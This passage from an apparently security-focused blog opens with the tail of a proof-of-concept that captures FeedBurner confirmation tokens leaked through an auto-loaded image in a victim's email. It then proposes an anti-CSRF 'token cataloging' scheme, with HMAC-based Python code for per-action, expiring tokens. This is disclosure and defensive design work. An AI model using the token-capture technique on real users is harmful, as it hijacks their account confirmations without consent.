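# What arrives when the victim's mail client auto-loads the <img>
# (the confirmation URL shown here is made up for illustration):
handle_request(
    "/feedburner_poc/newentry?p=https://feedburner.google.com/fb/a/confirm?token=abc123"
)
print(captured)
```

In a real deployment this function would sit behind any HTTP server; the point is that the "exploit" server contains zero attack logic – the victim's mail client does all the work.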

Google hasn't accepted this submission. They said, and they are totally right, that the SMTP mail is sent by FeedBurner with a Content-Type: text/plain header, and that it is therefore the email provider's fault for ignoring this header and parsing the HTML anyway, although it is told not to.

But still, this case-study was presented to you to show how everyday, "innocent & totally safe" features can be used to cause great harm.

Tokens Tokening

Our case-study today will set some ground rules for a new Anti-CSRF attitude that I have been working on for the past few months. This new attitude, or, for the sake of correctness – mechanism, basically catalogs CSRF tokens. Don't freak out! You'll understand it in no time.

First, I must say that I am probably not the first one to think of this attitude. During some research I came across the same principles of the token cataloging method I am about to show you.

So, what the hell is token cataloging, you ask? It's simple. This is an Anti-CSRF security attitude (/policy/agreement/arrangement – call it what you want) where CSRF tokens are separated into different action categories. This means there will be a certain token type for input actions, such as editing a certain field or inserting new data, and a different token type for output actions, such as fetching sensitive information from the server, or requesting a certain private resource.

These two main token groups will now lead our way to security perfection. Whenever a user is supplied with a form to fill, he will also be supplied with an input-action token – a one-time, about-to-expire token which will only be valid for this specific session user, and will expire x minutes after its creation time. This input token will then be related to this specific form's token family, and will only be valid in actions of this family type.

Now, after explaining the “hard, upper layer”, let’s get down with some examples:

Let’s say we have a very simple & lite web application which allows users to:
a. Insert new posts to a certain forum.
b. Get the name of each post creator & the date of the creation of the post.

Ok, cool. We are allowing two actions: an input one (a), and an output one (b). This means we’ll use two token-families: one for inserting new posts, and the other for getting information about a certain post. We’ll simply generate a unique token for each of these actions, and supply it to the user.

But how are we going to validate the tokens?
This is the tricky part. Saving tokens in the database is a total waste of space, unless they are needed for a long time. Since our new attitude separates the tokens into different families, we also use different types of tokens – some tokens should only be integers (long, of course), some should only be characters, and some should be both. When there is no need to save the token for further actions, the token should not be kept in a data collection; it should be generated specifically for each user.
What does that mean? That we can derive tokens from details of the session user which we already have – his session cookie, his username (obfuscated, of course) – and mix in some factors in order to generate the token in a unique way, one that can only be 'understood' by our own logic later, in the token validation process. No more creating a random, meaningless 32-character token that could be used a trillion times. Each action should have its own unique token.
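One way to get storage-free, per-family, expiring tokens is an HMAC over the data you already have. A sketch of my own construction (the secret, session ID and family names are all hypothetical):

```python
import hashlib
import hmac
import time

SECRET = b"server-side-secret"  # hypothetical; never hard-code this in real life

def make_token(session_id: str, family: str, ttl: int = 300) -> str:
    """Derive a token valid only for this session, this action family,
    and the next `ttl` seconds. Nothing is stored server-side."""
    expires = int(time.time()) + ttl
    msg = f"{session_id}|{family}|{expires}".encode()
    mac = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return f"{expires}.{mac}"

def check_token(token: str, session_id: str, family: str) -> bool:
    """Recompute the MAC from our own logic – no DB lookup needed."""
    try:
        expires_s, mac = token.split(".")
        expires = int(expires_s)
    except ValueError:
        return False
    if time.time() > expires:
        return False  # the 'about-to-expire' property
    msg = f"{session_id}|{family}|{expires}".encode()
    good = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, good)

t = make_token("sess42", "insert-post")
print(check_token(t, "sess42", "insert-post"))  # True
print(check_token(t, "sess42", "fetch-post"))   # False – wrong token family
```

Because the family name is mixed into the MAC, an input-action token can never be replayed against an output action, and validation costs a hash computation instead of a database round-trip.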

“This is so frustrating and unnecessary, why should I do it?”
If you don't care about resubmission of forms, that's OK. But what about anti-brute-forcing, or even anti-DoSing? Remember that each action that inserts or fetches data from the DB costs you space and resources. If you don't have the right anti-brute-force or anti-DoS mechanism in place, you will go down.
By validating that each action was originally intended to happen, you will save unnecessary connections to the DB.

If implementing this attitude costs you too much, simply implement some of the ideas that were presented here. Remember that using the same type of token to allow different actions may cause you harm & damage. If you don't want to generate a token for each user's unique action, at least generate a token for each of the user's "general" action types, like output and input actions.